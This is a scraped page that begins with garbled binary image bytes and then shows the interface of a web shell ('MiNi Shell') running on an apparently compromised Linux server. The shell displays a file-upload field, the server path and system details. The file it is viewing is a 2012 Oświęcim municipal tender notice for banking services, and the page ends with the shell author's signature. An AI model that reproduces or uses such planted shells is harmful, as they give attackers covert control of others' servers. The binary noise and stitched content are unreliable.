JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121108/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121108/439340-N-2012.html

<p class="kh_header"><b>Oświęcim: Prowadzenie kompleksowej bankowej obsługi budżetu Miasta Oświęcim oraz miejskich jednostek organizacyjnych, finansowanych z budżetu Miasta Oświęcim w latach 2013-2016.</b><br>
<b>Numer ogłoszenia: 439340 - 2012; data zamieszczenia: 08.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Oświęcim , ul.Zaborska 2, 32-600 Oświęcim, woj. małopolskie, tel. 033 8429311,8429311, faks 033 8429199.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.oswiecim.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie kompleksowej bankowej obsługi budżetu Miasta Oświęcim oraz miejskich jednostek organizacyjnych, finansowanych z budżetu Miasta Oświęcim w latach 2013-2016..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3. Zakres przedmiotu zamówienia obejmuje w szczególności:
otwarcie i likwidację bieżących, pomocniczych i walutowych rachunków  bankowych,
prowadzenie oprocentowanych bieżących, pomocniczych i walutowych rachunków bankowych,
przeprowadzanie rozliczeń pieniężnych gotówkowych i bezgotówkowych (w formie elektronicznych lub/i papierowych zleceń),
przeprowadzanie rozliczeń pieniężnych wysokokwotowych w czasie rzeczywistym,
przeprowadzanie rozliczeń zagranicznych, 
przeliczanie gotówki przyjętej w formie zamkniętych kaset metalowych pochodzących z parkomatów - bez obecności wpłacającego,
sporządzanie wyciągów bankowych w formie papierowej za każdy dzień, w którym dokonano operacji finansowych na rachunku, z wykazaniem salda rachunku, a także udostępnianie odbioru tych wyciągów wraz z załącznikami najpóźniej w następnym dniu roboczym, udostępnienie elektronicznego podglądu i wydruku bieżącego wyciągu bankowego i historii rachunku, 
wydawanie opinii i zaświadczeń na wniosek posiadacza rachunku,
automatyczne lokowanie środków finansowych w postaci depozytów overnight, weekendowych i w dniach, 
możliwość lokowania wolnych środków finansowych na lokatach terminowych zgodnie z przepisami art. 48 ustawy o finansach publicznych,
krótkoterminowy kredyt odnawialny w rachunku bieżącym z przeznaczeniem na pokrycie występującego w ciągu roku przejściowego deficytu budżetu,
codzienne konwojowanie gotówki - średnio 2 razy w ciągu dnia pomiędzy Bankiem a Zamawiającym,
obsługa rachunków bankowych za pośrednictwem bankowości elektronicznej/internetowej,
telefoniczne informowanie o saldzie i obrotach na rachunkach bankowych,
konsolidację i redystrybucję sald wskazanych rachunków bankowych,
miesięczną kapitalizację odsetek na rachunkach bieżących i pomocniczych,
automatyczne przekazywanie skapitalizowanych odsetek z wybranych rachunków bankowych na wskazany rachunek bankowy Zamawiającego, 
prowadzenie systemu płatności masowych,
wydawanie i obsługa kart płatniczych.

4.  Bank winien świadczyć usługi na rzecz Zamawiającego w godz. 8:00  do 17:00.

5. Bank powinien posiadać siedzibę, oddział lub filię na terenie miasta Oświęcim. W przypadku braku takich placówek, bank zobowiązuje się do otworzenia placówki, oddziału lub filii w granicach administracyjnych miasta Oświęcim najpóźniej do dnia 31 grudnia 2012 r.

6. Bank powinien zapewnić uruchomienie w swojej siedzibie, oddziale lub filii znajdujących się na terenie miasta Oświęcim dodatkowego stanowiska kasowego do obsługi podatników Urzędu Miasta Oświęcim, przez okres 14 dni (10 dni roboczych) poprzedzających terminy płatności podatków tj. 15 marzec, 15 maj, 15 wrzesień, 15 listopad każdego roku kalendarzowego.

7. Rozliczenia pomiędzy Zamawiającym a Bankiem usług bankowych będą dokonywane 
w złotych polskich.

8. Za świadczone czynności związane z obsługą rachunku Bank pobiera prowizje i opłaty w wysokościach zawartych w ofercie, które będą  niezmienne w okresie obowiązywania umowy. Zwiększenie ilości i wartości rodzaju usług wymienionych w SIWZ nie będzie powodowało zmiany zaoferowanych stawek  opłat i prowizji bankowych.
9. Ilość operacji, rachunków w PLN i w walucie obcej, stanowisk obsługi bankowości elektronicznej/internetowej może ulec zmianie np. wskutek uregulowań prawnych, które będą nakładały na Zamawiającego obowiązek otwarcia wyodrębnionych rachunków bankowych dla wskazanych operacji finansowych, pojawienia się nowych rozwiązań technicznych, powstania nowych jednostek organizacyjnych Zamawiającego bądź zmian organizacyjnych Zamawiającego, przy czym cena opłat pozostanie bez zmian.

10. Ilekroć w specyfikacji i załącznikach do specyfikacji jest mowa: 
o prowizji - należy przez to rozumieć wynagrodzenie brutto płatne procentowo od kwoty (wartości),
o opłacie - należy przez to rozumieć wynagrodzenie brutto płatne kwotowo od czynności,
o cenie - należy przez to rozumieć cenę brutto skalkulowaną na podstawie podanych wielkości i ustalonych stałych stawek w okresie obowiązywania umowy za cały okres obowiązywania umowy zaoferowaną przez Bank.

11. Bank zobowiązany jest zapewnić Zamawiającemu możliwość automatycznej identyfikacji źródeł wpływów z określeniem nazwy Kontrahenta, tytułu płatności, daty obciążenia rachunku Kontrahenta bądź też daty dokonania wpłaty przez Kontrahenta za pośrednictwem poczty lub innych punktów, kwoty wpłaty lub innych parametrów uzgodnionych pomiędzy Zamawiającym a Bankiem. Zakres informacji nie będzie wykraczał poza dostępny w systemie rozliczeń międzybankowych.

12. Bank zobowiązany jest zapewnić, aby płatności dokonywane na rzecz Zamawiającego   przez Kontrahentów i pracowników Zamawiającego realizowane były przez Bank bez opłat  i prowizji.

13. Zamawiający wymaga aby Bank nie obciążał osób trzecich prowizjami i opłatami od wpłat gotówkowych przyjmowanych na rachunki Zamawiającego.

14. Prowizje od wpłat gotówkowych, przelewów, wypłat oraz opłat za prowadzenie rachunku bankowego są potrącane z wybranego rachunku wskazanego przez Zamawiającego.

15. Po każdej codziennej zmianie stanu rachunku bankowego Bank generuje Zamawiającemu dzienne papierowe wyciągi z każdego prowadzonego rachunku, jako zestawienia operacji przeprowadzonych na poszczególnych rachunkach bankowych z podaniem sald początkowych i końcowych. Wyciągi bankowe mają zawierać wszystkie informacje o płatnościach jakie zostały umieszczone przez Kontrahentów w opisie/tytule płatności. Wyciągi muszą zawierać informacje tożsame z danymi umieszczonymi w systemie elektronicznej obsługi rachunków bankowych udostępnionym dla Zamawiającego. 

16. Wyciąg bankowy musi zawierać pełną nazwę rachunku, walutę rachunku, pełną nazwę posiadacza rachunku oraz zawierać informacje o przeprowadzonych wpłatach, wypłatach, przelewach, numerach rachunków beneficjentów i ich pełne nazwy, pełnych tytułach płatności, datach uznania lub obciążenia rachunku, wysokości kursu zastosowanego w przypadku transakcji walutowych, informacje na temat kredytu, lokat, okresów odsetkowych. 

17. Do każdego wyciągu bankowego należy dołączyć papierowe załączniki i wtórniki dokumentujące  każdą operację wykazaną na wyciągu bankowym.  
Wymogi w tym zakresie podyktowane są koniecznością prawidłowego zaksięgowania dokonanej wpłaty z uwzględnieniem wszystkich jej elementów.   

18. W przypadku stwierdzenia niezgodności salda rachunku Zamawiający zobowiązany jest zgłosić niezgodność w terminie 14 dni od daty otrzymania wyciągu.

19. Na żądanie Zamawiającego Bank zobowiązany będzie przekazać w możliwie najkrótszym terminie informację o godzinie dokonania wpłaty na rachunek Zamawiającego.

20. Bank zobowiązany jest niezwłocznie zbadać zgłoszoną reklamację i udzielić Zamawiającemu właściwych informacji. 

21. Kapitalizacja odsetek od oprocentowania środków pieniężnych zgromadzonych na rachunkach Zamawiającego następować będzie raz na koniec każdego miesiąca tj. w ostatnim dniu kalendarzowym miesiąca, za który następuje naliczenie.

22. Bank zapewni Zamawiającemu usługę automatycznego lokowania środków pieniężnych typu Overnight opartą na konsolidacji i redystrybucji sald wybranych rachunków wskazanych  przez Zamawiającego. Konsolidacja sald będzie następowała na koniec każdego dnia roboczego natomiast redystrybucja sald będzie następowała następnego dnia roboczego następującego po konsolidacji - nie później niż do godz. 8.00 rano. 
Wysokość oprocentowania środków pieniężnych lokowanych w ten sposób będzie każdorazowo ustalana jako iloczyn stawki WIBID O/N obowiązującej w dniu uruchomienia usługi i stałego w całym okresie obowiązywania Umowy współczynnika określonego w Formularzu Ofertowym.

23. Kapitalizacja odsetek od oprocentowania depozytów pieniężnych typu Overnight zgromadzonych na rachunku konsolidującym Zamawiającego następować będzie w każdym dniu roboczym miesiąca za okres, za który następuje naliczenie.

24.  Kredyt udzielony zostanie bez żadnych prowizji i opłat: jedynym kosztem dla Zamawiającego będą odsetki za rzeczywiście wykorzystany kredyt.

25. Wysokość oprocentowania kredytu krótkoterminowego w rachunku bieżącym Zamawiającego, będzie określona jako suma stawki zmiennej WIBOR 1M  z notowania obowiązującego w ostatnim dniu miesiąca poprzedzającego miesiąc naliczania odsetek i stałej w całym okresie obowiązywania Umowy kredytowania marży Banku podanej w Formularzu Ofertowym. Aktualizacja oprocentowania odbywa się miesięcznie. Zabezpieczeniem kredytu może być oświadczenie o poddaniu się egzekucji na podstawie prawa bankowego lub weksel własny in blanco wraz z deklaracją wekslową. 

26. Odsetki od wykorzystanego kredytu będą płatne każdego 10 - go kalendarzowego dnia miesiąca za miesiąc poprzedni. W przypadku gdy jest to dzień wolny od pracy - w następnym dniu roboczym, i pobierane przez Bank ze wskazanego przez Zamawiającego rachunku wydatków, po uprzednim przesłaniu do Zamawiającego w formie faxu lub scanu zawiadomienia o wysokości tych odsetek.

27. Odsetki od wykorzystanego kredytu naliczane będą w okresach miesięcznych (kalendarz rzeczywisty tj. od pierwszego  do ostatniego dnia miesiąca),od faktycznego zadłużenia według stopy  procentowej wyrażonej jako suma zmiennej stawki bazowej WIBOR 1M i stałej w całym okresie kredytowania marży Banku, podanej w Formularzu ofertowym, przy naliczaniu odsetek przyjmuje się kalendarz rzeczywisty, rok liczy rzeczywistą ilość dni tj. 365 dni (366 dni w roku przestępnym).

28. Bank zapewni dostęp i korzystanie z Systemu bankowości elektronicznej/internetowej obsługi rachunków bankowych za pośrednictwem strony internetowej Banku oraz jego serwisowanie. System elektronicznej/internetowej obsługi rachunków musi spełniać wymogi bezpieczeństwa teleinformatycznego. Ponadto System  musi umożliwiać w szczególności:
a) dostęp do usług przez 24 godziny w każdym dniu roboczym,
b) dokonywanie operacji/transakcji i uzyskiwanie wiadomości o wszystkich operacjach i saldach na wszystkich rachunkach w czasie rzeczywistym,
c) tworzenie zbiorów danych rachunków, Kontrahentów i innych danych ewidencyjnych,
d) przeszukiwanie zbiorów wszystkich operacji na wszystkich rachunkach wg rodzaju operacji, nazwy Kontrahenta, daty, okresu, kwoty, liczby i innych wyodrębnionych kryteriów; przy czym w okresie obowiązywania Umowy Bank zobowiązany jest zapewnić możliwość przeszukiwania on-line zbiorów danych z całego okresu objętego obsługą bankową (4 lata) oraz prowadzić w tym zakresie archiwum,
e) składanie poleceń przelewu, w tym poleceń przelewu zagranicznego, ze wszystkich rachunków w ramach dostępnych środków,
f) składanie poleceń przelewu z datą przyszłą, z możliwością ich usuwania, przeglądania, modyfikowania;
g) import przelewów przygotowanych w systemie finansowo-księgowym REKORD Zamawiającego wg formatu wynikającego z tego systemu,
h) jednoczesne funkcjonowanie wszystkich stanowisk w tym samym czasie (wymóg Systemu wielostanowiskowego),
i) informowanie użytkowników o wszystkich istotnych sprawach związanych z Systemem (np. awarie, aktualizacje, transakcje odrzucone przez Bank)
Bank zobowiązany jest udzielić Zamawiającemu na czas trwania Umowy bezpłatnej, niewyłącznej licencji na System elektronicznej/internetowej obsługi rachunków bankowych. Ponadto Bank zobowiązany jest na własny koszt zainstalować i konserwować w okresie trwania umowy dodatkowe urządzenia lub inne wyposażenie potrzebne do działania tego Systemu/akcesoria bankowe. Bank zobowiązany jest do przeszkolenia użytkowników System elektronicznej/internetowej obsługi rachunków bankowych Zamawiającego w zależności                od zgłaszanych przez Zamawiającego potrzeb. Bank zobowiązany jest również do dostosowania formatu wymiany danych do stosowanego u Zamawiającego systemu finansowo-księgowego          w zakresie formatu plików danych źródłowych z Systemu bankowego w sposób umożliwiający współpracę z systemem finansowo-księgowym Zamawiającego. Po zakończeniu Umowy Bank zobowiązany jest przekazać Zamawiającemu w terminie 14 dni bazę danych z archiwum operacji na rachunkach oraz słowniki z danymi wprowadzonymi przez Zamawiającego (w tym m.in. Rachunki Kontrahentów i dane teleadresowe), w formacie uzgodnionym z Zamawiającym.

29. Bank zobowiązany jest otworzyć i prowadzić wirtualne rachunki dla Kontrahentów płatności masowych. Identyfikacja płatności przychodzących i wychodzących będzie odbywała się w oparciu o unikalny identyfikator jaki zostanie umieszczony w indywidualnym numerze rachunku bankowego. Księgowanie wpłat i wypłat na rachunki wirtualne będzie odbywało się na wskazanych przez Zamawiającego rachunkach. Plik elektroniczny wg formatu określonego przez Zamawiającego o wpłatach i wypłatach dokonywanych za pośrednictwem wirtualnych rachunków Bank zobowiązany jest przekazać Zamawiającemu najpóźniej do godz. 8:00 następnego dnia roboczego. Bank zobowiązany jest również zapewnić dokonywanie płatności na wirtualne rachunki Kontrahentów za pomocą kart płatniczych. Bank zobowiązany jest zapewnić import przelewów przygotowanych w systemie finansowo-księgowym Zamawiającego do Systemu bankowości elektronicznej/internetowej wg stosowanego obecnie formatu.
30. Bank corocznie przekazuje zawiadomienie o wysokości sald na rachunkach bankowych Zamawiającego wg stanu na koniec każdego roku kalendarzowego.
31. W przypadku likwidacji stawki WIBOR 1M lub/i stawki WIBID O/N  zostaną one zamienione na stawki, które ich zastąpią, albo na stawki najbardziej zbliżone swoją wielkością i częstotliwością  notowań. 
32.  Bank nie będzie pobierał innych opłat i prowizji niż określone w Formularzu ofertowym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4, 66.10.00.00-1, 66.11.20.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Bank wykaże, że posiada  uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. zezwolenie Komisji Nadzoru Finansowego na utworzenie banku oraz podjęcie działalności gospodarczej zgodnie z przepisami ustawy z dn. 29.08.1997 r. Prawo Bankowe (Dz. U. z 2002 r. Nr 72, poz. 665 z p.zm.), a dla banków utworzonych przed wejściem w życie cyt. ustawy zgodę Prezesa Narodowego Banku Polskiego na utworzenie banku a w przypadku banków państwowych rozporządzenie Rady Ministrów.

Opis sposobu oceny spełnienia warunku zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Bank wykaże wykonanie w okresie ostatnich 3 lat co najmniej 1 usługi w zakresie objętym przedmiotem zamówienia tj. prowadzenie przez Bank co najmniej jednego rachunku bieżącego dla jednostki sektora finansów publicznych przez okres co najmniej 1 roku

Opis sposobu oceny spełnienia warunku zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 92.00</li>
<li>2 - Oprocentowanie środków na rachunkach bankowych  oraz lokat  typu Overnight O/N - 8.00</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie treści art. 144 ustawy Pzp zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy za wyjątkiem przypadków określonych w niniejszej specyfikacji.
 Dopuszcza się  zmianę umowy w następujących przypadkach: 
-  zmiany danych teleadresowych Wykonawcy lub Zamawiającego,
- zmianą ilości rachunków bankowych oraz form organizacyjnych jednostek powiązanych z budżetem Miasta.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.oswiecim.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Oświęcim, Wydział Zamówień Publicznych ul. Solskiego 2 pok 11, 32-600 Oświęcim.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.11.2012 godzina 10:00, miejsce: Urząd Miasta Oświęcim, ul. Zaborska 2 pok. 01, 32-600 Oświęcim.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com